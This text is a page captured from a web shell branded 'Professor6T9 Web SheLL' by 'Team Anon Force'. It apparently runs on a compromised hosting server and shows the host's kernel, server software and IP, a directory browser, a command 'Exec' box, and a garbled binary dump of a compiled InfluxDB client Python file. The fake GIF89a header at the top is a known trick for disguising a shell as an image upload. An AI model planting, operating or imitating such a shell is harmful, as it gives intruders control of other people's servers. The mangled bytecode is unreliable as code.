GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux das102.truehost.cloud 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
156.232.88.2
/
opt
/
alt
/
python38
/
lib
/
python3.8
/
site-packages
/
influxdb_client
/
domain
/
__pycache__
[ HOME ]
Exec
Submit
scraper_target_response.cpython-38.pyc
U ܒi� � @ s4 d Z ddlZddlZddlmZ G dd� de�ZdS )a InfluxDB OSS API Service. The InfluxDB v2 API provides a programmatic interface for all interactions with InfluxDB. Access the InfluxDB API using the `/api/v2/` endpoint. # noqa: E501 OpenAPI spec version: 2.0.0 Generated by: https://openapi-generator.tech � N)�ScraperTargetRequestc @ s� e Zd ZdZddddddddddd� Zdddd d ddd ddd� Zd*dd�Zedd� �Zej dd� �Zedd� �Z e j dd� �Z edd� �Zej dd� �Zedd� �Zej dd� �Zd d!� Z d"d#� Zd$d%� Zd&d'� Zd(d)� ZdS )+�ScraperTargetResponsez�NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. �str�object�bool) �id�org�bucket�links�name�type�url�org_id� bucket_id�allow_insecurer r r r r r r ZorgIDZbucketIDZ allowInsecureNFc C sr t j| ||||| | d� d| _d| _d| _d| _d| _|dk rD|| _|dk rR|| _|dk r`|| _ |dk rn|| _ dS )z3ScraperTargetResponse - a model defined in OpenAPI.)r r r r r r N)r �__init__�_id�_org�_bucket�_linksZ discriminatorr r r r )�selfr r r r r r r r r r � r �_/opt/alt/python38/lib/python3.8/site-packages/influxdb_client/domain/scraper_target_response.pyr <